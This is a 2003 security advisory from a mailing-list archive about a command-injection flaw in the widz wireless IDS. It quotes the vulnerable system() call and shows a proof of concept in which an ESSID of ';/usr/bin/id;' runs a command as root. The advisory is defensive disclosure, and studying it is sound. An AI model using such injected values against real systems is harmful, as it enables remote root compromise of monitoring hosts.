Vulnwatch mailing list archives
SRT2003-08-22-104 - Wireless Intrusion dection remote root compromise
From: KF <dotslash () snosoft com>
Date: Fri, 22 Aug 2003 20:31:24 -0500
http://www.secnetops.biz/products/ http://www.secnetops.biz/research/
Secure Network Operations, Inc. http://www.secnetops.com Strategic Reconnaissance Team research () secnetops com Team Lead Contact kf () secnetops com Our Mission: ************************************************************************ Secure Network Operations offers expertise in Networking, Intrusion Detection Systems (IDS), Software Security Validation, and Corporate/Private Network Security. Our mission is to facilitate a secure and reliable Internet and inter-enterprise communications infrastructure through the products and services we offer. Quick Summary: ************************************************************************ Advisory Number : SRT2003-08-22-104 Product : widz (802.11 wireless IDS) Version : <= v1.5 Vendor : http://www.loud-fat-bloke.co.uk/w80211.html Class : remote Criticality : High Operating System(s) : *nix High Level Explanation ************************************************************************ High Level Description : widz make use of untrusted input with system() What to do : do not use widz in a production environment Technical Details ************************************************************************ Proof Of Concept Status : SNO has PoC code for this issue Low Level Description : WIDZ, "the first OpenSource wireless IDS" has the ability to Detects Rogue APs and Monkey-jacks. Null probes , floods, and it has a Mac Backlist and ESSID blacklist so you can catch the obvious badguys. from the file READMEwidz.txt we learn the following about widz_apmon.c This sad little program monitors an area for Access Points If finds an ap it compares it to a list of Authorised APs in a config file if the AP isnt in list it calls a program called Alert with an appropriate message. If you give widz_apmon a little test drive you will get the following. snifz0r widz # ./widz_apmon 1 eth1 monitor unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55 unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55 unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55 unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55 unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55 unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55 ... I wonder how that alert gets generated... File: widz_apmon.c do_alert(char *target) { char mess[100]; if ( DEBUG ) printf("Alert unknown AP %s\n", target); sprintf(mess,"Alert 'unknown AP %s\n'", target); system(mess); // Should do a check to see if we've alerted already but !!! } Hrmm thats no good... but fun to play with non the less. Go to apple airport and set network name to ';/usr/bin/id; (hint: use HostAP instead) snifz0r widz # ./widz_apmon 1 eth1 monitor unknown AP essid= uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) sh: -c: line 3: unexpected EOF while looking for matching `'' sh: -c: line 4: syntax error: unexpected end of file At this point the attacker can pretty much do what they wish. As a side note this is not the only WIDZ program to make use of system() in this manor. Patch or Workaround : update will be in final version of widz Vendor Status : fix available "in the next couple of weeks" as of 07/26/03 Bugtraq URL : to be assigned ------------------------------------------------------------------------ This advisory was released by Secure Network Operations,Inc. as a matter of notification to help administrators protect their networks against the described vulnerability. Exploit source code is no longer released in our advisories. Contact research () secnetops com for information on how to obtain exploit information.
Current thread:
- SRT2003-08-22-104 - Wireless Intrusion dection remote root compromise KF (Aug 23)